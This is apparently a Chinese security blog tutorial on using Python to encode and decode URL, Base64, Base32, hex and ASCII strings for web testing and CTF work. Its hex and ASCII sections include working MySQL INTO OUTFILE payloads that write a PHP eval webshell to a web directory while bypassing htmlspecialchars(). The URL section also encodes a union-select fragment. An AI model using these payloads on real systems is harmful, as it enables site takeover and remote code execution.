前言

記得剛入門那個時候，自己處理編碼轉換問題往往是“百度：url解碼、base64加密、hex……”，或者是使用一款叫做“小葵多功能轉換工具”的軟件，再后來直接上Burpsuite的decoder功能，感覺用的還挺好的。不過，也遇到些問題：在線轉換效率低(搜索占去了2/3的時間)、兩款工具存在一些小問題，比如burp中涉及中文往往顯示亂碼。

直到使用python來作為我日常編碼轉換工具……

開啟py轉換之旅

url編碼

url編碼是一種瀏覽器用來打包表單輸入的格式.可謂是一名作為web人員最熟悉的一種編碼方式了。

>>> from urllib import *>>> quote("union select null,null,null")'union%20select%20null%2Cnull%2Cnull'>>> unquote("union%20select%20null%2Cnull%2Cnull")'union select null,null,null'>>> urlencode({'x':'2333','y':'666'})'y=666&x=2333'

Base64

Base64常常用作網頁表單和HTTP傳輸的一些參數，也常用于郵件協議傳輸用戶信息等。

>>> import base64>>> base64.b64encode("admin")'YWRtaW4='>>> base64.b64decode('YWRtaW4=')'admin'

記得有次ctf比賽中考到了base32解密，一般網站不提供在線解密，一時之間貌似沒有辦法繼續下去。不過如果你使用python的話會像上邊解密base64一樣簡單，只需要將函數改變下：

>>> import base64>>> base64.b32encode('jjjjj')'NJVGU2TK'>>> base64.b32decode('NJVGU2TK')'jjjjj'

Hex

十六進制編碼也是web application中常見的一種編碼方案。作為一名web安全人員，我們心知肚明的是，MySQL注入可以使用hex繞過htmlspecialchars()函數從而寫入webshell。

比如：

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'

下面是python實現hex加解密的方法：

>>> '<?php @eval($_POST[a]); ?>'.encode('hex')'3c3f70687020406576616c28245f504f53545b615d293b203f3e'>>>>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')<?php @eval($_POST[a]); ?>>>>

ASCii

MySQL中的char()函數則是轉換ascii碼的，正因如此，也可以使用這個特性來繞過htmlspecialchars()函數。

比如：

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'